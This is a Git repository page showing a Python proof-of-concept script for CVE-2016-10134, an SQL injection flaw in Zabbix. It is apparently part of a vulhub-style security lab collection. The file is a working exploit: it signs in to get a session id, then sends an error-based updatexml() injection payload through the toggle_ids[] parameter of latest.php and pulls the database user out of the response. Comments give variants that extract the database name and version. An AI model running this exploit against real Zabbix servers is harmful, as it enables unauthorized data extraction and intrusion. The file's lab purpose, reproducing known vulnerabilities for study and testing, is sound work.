aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/zabbix/CVE-2016-10134/CVE-2016-10134.py
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

97 lines
2.4 KiB
Python
Raw Permalink Blame History

# -*- coding: utf-8 -*-
# @Time : 2021/12/23
# @Author : TesterCC
import json
from optparse import OptionParser
import re
import sys
from requests import session
# initialization
ret = dict()
ret['status'] = str()
ret['info'] = list()
ss = session()
ss.headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}
# CVE-2016-10134 # python3 CVE-2016-10134.py --target 127.0.0.1:8080
def get_payload1(text) -> str:
payload = re.search(r"\[(.*\))\]", text)
return payload.group(1)
def get_sql_injection_info(text) -> str:
sql_injection_info = re.search(r"<\/li><li>(.*)\'\]", text)
return sql_injection_info.group(1)
def attack(target):
'''login zabbix'''
login_url = "http://{}/index.php".format(target)
ret0 = ss.get(login_url)
cookie_dict = {i.name: i.value for i in ret0.cookies}
# get sid
sid = cookie_dict.get('zbx_sessionid')[16:]
data = {"sid": sid,
"form_refresh": "1",
"name": "",
"password": "",
"enter": "Sign+in"}
retn = ss.post(url=login_url, headers=ss.headers, data=data)
if retn.status_code == 200:
# updatexml(0,concat(0xa,database()),0)
# updatexml(0,concat(0xa,version()),0)
payload1 = f"http://{target}/latest.php?output=ajax&sid={sid}&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)"
retn2 = ss.get(url=payload1, headers=ss.headers)
if retn2.status_code == 200:
resp = {
"payload": get_payload1(retn2.text),
"info": get_sql_injection_info(retn2.text)
}
ret['status'] = 'success'
ret['info'] = resp
return ret
def main():
usage = "Usage: python3 CVE-2016-10134.py --target <target ip:port>"
parse = OptionParser(usage=usage)
parse.add_option("-t", '--target', type="string", dest="target", help="server ip:port, e.g. 127.0.0.1:8080")
options, args = parse.parse_args()
if not options.target:
ret['status'] = 'fail'
ret['info'] = "target empty"
print(usage)
sys.exit()
else:
target = options.target
try:
attack(target)
except Exception:
ret['status'] = 'fail'
print(json.dumps(ret))
if __name__ == '__main__':
main()
Reference in New Issue View Git Blame Copy Permalink